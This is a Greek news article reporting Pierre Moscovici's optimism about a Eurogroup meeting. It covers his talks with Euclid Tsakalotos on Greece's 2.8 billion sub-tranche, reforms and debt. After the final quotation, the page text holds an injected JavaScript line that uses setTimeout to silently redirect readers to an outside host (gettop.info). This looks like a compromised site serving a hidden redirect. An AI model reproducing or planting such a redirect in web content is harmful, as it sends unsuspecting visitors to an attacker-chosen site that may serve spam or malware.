Αισιόδοξος ο Μοσκοβισί για πρόοδο στο Eurogroup της Δευτέρας

0
2

 

Θετική χαρακτήρισε ο Ευρωπαίος Επίτροπος Πιερ Μοσκοβισί τη συνάντηση που είχε στο περιθώριο της ετήσιας συνόδου του ΔΝΤ και της Παγκόσμιας Τράπεζας  με τον Έλληνα υπουργό Οικονομικών Ευκλείδη Τσακαλώτο.

Ο Ευρωπαίος Επίτροπος μιλώντας στον απεσταλμένο του ΑΝΤ1 στην Ουάσινγκτον Θανάση Τσίτσα, δήλωσε ότι συζητήθηκαν τα προαπαιτούμενα που πρέπει να ολοκληρωθούν μέχρι τη Δευτέρα, όπου θα αποφασιστεί η αποδέσμευση της υποδόσης των 2,8 δις στην Ελλάδα.

«Μόλις αυτό ολοκληρωθεί τότε θα μπορούμε να πάμε στο επόμενο βήμα που είναι η δεύτερη αξιολόγηση, που αφορά κυρίως την υλοποίηση μεταρρυθμίσεων και τότε αν βρούμε ένα λειτουργικό τρόπο, μια καλή συμφωνία, τότε η ελληνική κυβέρνηση θα αναλάβει τις ευθύνες της και εμείς τις δικές μας που σημαίνει να συζητήσουμε αναφορικά με το χρέος», συμπλήρωσε ο κ. Μοσκοβισί που δήλωσε αισιόδοξος για το Eurogroup της Δευτέρας, στο οποίο όπως είπε πιστεύει ότι θα υπάρξει πρόοδος.

Σχολιάζοντας τη στάση του ΔΝΤ και το ζήτημα του χρέους είπε: «Ας προχωρούμε βήμα-βήμα. Στόχος της Επιτροπής είναι μια παγκόσμια συμφωνία ως το τέλος του έτους, αλλά αυτό σημαίνει πρώτα μεταρρυθμίσεις, οι οποίες πρέπει να υλοποιηθούν πλήρως.

Απαντώντας σε ερώτηση τι θα γίνει σε διαφορετική περίπτωση ο κ. Μοσκοβισι ξεκαθάρισε: «Δεν υπάρχει “αλλιώς”, δεν είμαι τύπος του “και αν…”. Θα γίνει, διότι είναι προς το κοινό συμφέρον της Ελλάδας και της Ευρωζώνης ως συνόλου». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here